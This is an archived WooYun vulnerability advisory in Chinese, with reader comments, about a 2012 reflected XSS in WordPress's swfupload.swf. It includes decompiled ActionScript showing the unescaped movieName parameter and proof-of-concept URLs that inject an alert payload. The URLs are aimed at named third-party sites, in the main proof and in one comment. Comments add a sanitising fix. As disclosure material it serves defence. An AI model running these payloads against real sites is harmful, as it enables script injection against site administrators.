当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07280

漏洞标题:WordPress反射型XSS

相关厂商:Wordpress

漏洞作者: 路人甲

提交时间:2012-05-18 15:28

修复时间:2012-05-18 15:28

公开时间:2012-05-18 15:28

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-05-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-05-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL 数据库的服务器上架设自己的网志。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。近日,国外安全研究人员公布,WordPress在部分功能实现上采用了不安全的第三方组件,导致XSS漏洞,当攻击者诱骗管理员点击,攻击成功可以直接GETSHELL。

详细说明:

原文:https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/
对wp-includes/js/swfupload/swfupload.swf进行反编译分析,尽管swfupload.swf其对传入ExternalInterface.call的第二个参数进行了安全编码,但对于函数名,即ExternalInterface.call的第一个参数没有进行安全编码。而函数名中的部分字符可控,造成xss漏洞。

this.movieName = root.loaderInfo.parameters.movieName;
...
this.flashReady_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].flashReady";
...
if (ExternalCall.Bool(this.testExternalInterface_Callback)){
    ExternalCall.Simple(this.flashReady_Callback);
    this.hasCalledFlashReady = true;
}
=================
class ExternalCall extends Object{
...
        public static function Simple(param1:String) : void
        {
            ExternalInterface.call(param1);
            return;
        }

漏洞证明:

http://www.80sec.com/wp-includes/js/swfupload/swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;alert(/xss/)}}//

修复方案:

暂时删除swfupload.swf,等待官方更新。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2012-05-18 16:27 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    flash火爆了

  2. 2012-05-18 16:53 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    缺陷关联: WooYun: JWPlayer Xss 0day [Flash编程安全问题] (Flash编程安全)

  3. 2012-05-18 16:54 | rayh4c ( 普通白帽子 | Rank:240 漏洞数:23 )

    @蟋蟀哥哥 @horseluke replacePattern = new RegExp("[^a-zA-Z0-9_]", "g"); this.movieName = replace(replacePattern, ""); this.flashReady_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].flashReady";

  4. 2012-05-18 21:10 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    昨天刚准备下载这个,看来免了。。。

  5. 2012-05-19 12:29 | Qcbf ( 路人 | Rank:0 漏洞数:1 | hello computer)

    新版本的wordpress修复了这个漏洞..www.32199.net/wp-includes/js/swfupload/swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;alert(/xss/)}}//我用的最新的wordpress..

  6. 2012-05-19 12:43 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @rayh4c 修补方法?

  7. 2012-05-19 12:44 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @horseluke 升级

  8. 2012-05-19 12:55 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @蟋蟀哥哥 额,我问的是,他所说的是不是一种修复方法?

  9. 2012-05-19 13:13 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @horseluke 他说的是利用和测试,证明他的blog已经没有这个漏洞了

  10. 2012-05-21 11:23 | nidao ( 路人 | Rank:7 漏洞数:3 | 还是木有。)

    怎么直接GETSHELL???